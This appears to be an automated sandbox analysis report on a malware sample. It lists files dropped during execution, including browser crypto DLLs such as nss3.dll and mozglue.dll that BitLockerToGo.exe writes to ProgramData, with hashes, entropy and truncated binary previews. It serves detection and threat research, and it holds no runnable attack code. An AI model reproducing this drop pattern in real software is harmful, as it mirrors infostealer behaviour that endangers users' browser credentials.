                                                                                                                                                                                                                                                                                                                                                        SHA1:85601548A163C9EB46DF782781934A6A15AEA65F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:52FF034F4E9059EA22E7E5500E8E4CBDD7D1CB2C9F16EFAE063029CF0AE1D3CE
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D0BF8E5360577D8D7E94ABC96422D418967E5ECD8EFD20685D21811C12AF90B2BD73BF4C072FAB42DFDE28D1F2AACAE820DC37AFB0C407E42FED7FDB7E49F813
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa43297ab, page size 16384, Windows version 10.0
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6585386228476557
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:JSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Jaza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                                                                                                                        MD5:E778B27EF0C3D6804E9C7EE5B4911A12
                                                                                                                                                                                                                                                                                                                                                        SHA1:4E8BEA74179271FFA803EAA982785E7656712B6A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:03DF57197C462C9B5DEFC1FF742D03D8CF6D6630CCE8739E69CD9F0A3180A4CE
                                                                                                                                                                                                                                                                                                                                                        SHA-512:934EAC51C9AE97F78964488D7697AEA96DA4CDF8918E75121518F9401F006B163CEF279E259F15E3D1DB976E949D60B92AD6165B14C1B175CD91A270CA0D377E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.2..... ...............X\...;...{......................T.~..... ....|'.;....|..h.|..... ....|'.T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................1.! ....|'....................) ....|'..........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.07908682484263033
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:FmtWetYepA4FX/KrWgCF+L5yAt/l0ZWgX/oll58Kgvvl/QoeP/ll:FmtTzpNVyyPQUTMgAz8KgR+t
                                                                                                                                                                                                                                                                                                                                                        MD5:606F80A2CCE6A3F712E27C69DD38BB3A
                                                                                                                                                                                                                                                                                                                                                        SHA1:7694F744584D50B1E0282635837E209068DEF47D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:73663B6E03CAFD51800E48E361E4C6E2D88888E75CCD7EEB1D4CA1169CB7877E
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CB21619519FDE0AF0CBF043A1ECA130800751F3FC1E8AB4239FB8445ED7B9AA574153365EE9EAD740CA619A969028138F5521F1C66CB99B97BDF4A2BFC3DB048
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:........................................;...{..;....|.. ....|'......... ....|'. ....|'.... ....|.....................) ....|'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):212730
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.466569808376566
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+r:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+r
                                                                                                                                                                                                                                                                                                                                                        MD5:164AF9F0CCEFADEC5474266C469611A3
                                                                                                                                                                                                                                                                                                                                                        SHA1:3B0CA6BC6252C81DF019B2FCE1940BEC06304542
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B2CB26ADC88908D8BAF6E26880A3D0709EAA852405B880859D74EAE04685D27D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6376074CE3D70D6CE1AC32C5717EAEC4EA6B692D274779D4D874EB8DA85B81F2F66D6EF9FBC879563E12FE9FA4BC7A0F4D351A859FAC0BD02CEF6ACBD1220C12
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\022c4f7d-9660-4c54-8b41-c078e22c3ea7.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44686
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.096013064619993
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBIwukhDO6vP6OWeCh5EEvhyaAcGoup1Xl3jVzXr4z:z/Ps+wsI7yOE869chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:03877D80A158A852C80E094603746C46
                                                                                                                                                                                                                                                                                                                                                        SHA1:28F5F118E0DE6627E961076B2F607A1594D5A60A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F611F9A35F301658EA159203F42DD35F6FECB1236592C9168EC429AAE952CE87
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F971AE9A64ECBCC9BF4B074FD19FAA0C28212D2BD158D445088439F7F5295B2555C05C6B05BEFB4086F16A93113FEA501CBC313D11FFBC5EDA500970EE8F635F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0d6cc6b0-cef1-4cac-948a-ab51e8bb72b2.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45727
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.088098365575187
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgx9rs2uBhDO6vP6OWeCh5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8HR9r769sIahfX7KRoVhu3VlXS
                                                                                                                                                                                                                                                                                                                                                        MD5:7DA9D502CDE03CFB4A69D51BADE5AFF9
                                                                                                                                                                                                                                                                                                                                                        SHA1:37F033538B8FA1AB3BD7FBA8AA238FB7387B6822
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FCABC38B6163AD1C93EC5F215C1BE188020ABABEE7D9BC6F0CE8A9AD971F25A4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4124E580BAD7F91704F75C8E732D2FEC58B86EE7E81330FE92BBD1B21B5A25F815FDE528DEA8F9FBAB5BB8A9C20BBB31B5A8BB7EB85073BB02EA8D62421E7DDB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\16290e53-b76c-4cc5-ada4-5d2a3cce2517.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6525bd53-f3d4-40dd-8e65-419250969b51.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45804
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08801873455293
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgcors2uBhDO6vP6OWeih5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8H8or76xsIahfX7KRoVhu3VlXS
                                                                                                                                                                                                                                                                                                                                                        MD5:84A527FDA4E4CA73618B0C0FB5E9914F
                                                                                                                                                                                                                                                                                                                                                        SHA1:42EFADEBA6E0F60497AAAEFC2DD17C7778058F25
                                                                                                                                                                                                                                                                                                                                                        SHA-256:1E5FF3519A0309905C71F3DA677843BD5D7AD1610034609A67C87ECC79D1760C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:904C882E21E026AB715CEAF3F800645DFD70B84E3F890B7F9531C5F4C7FA2E8D9FA48B235170EE9DCF003763CD9DEF5F3FF9F8C5386DA75361065B284C44C69D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
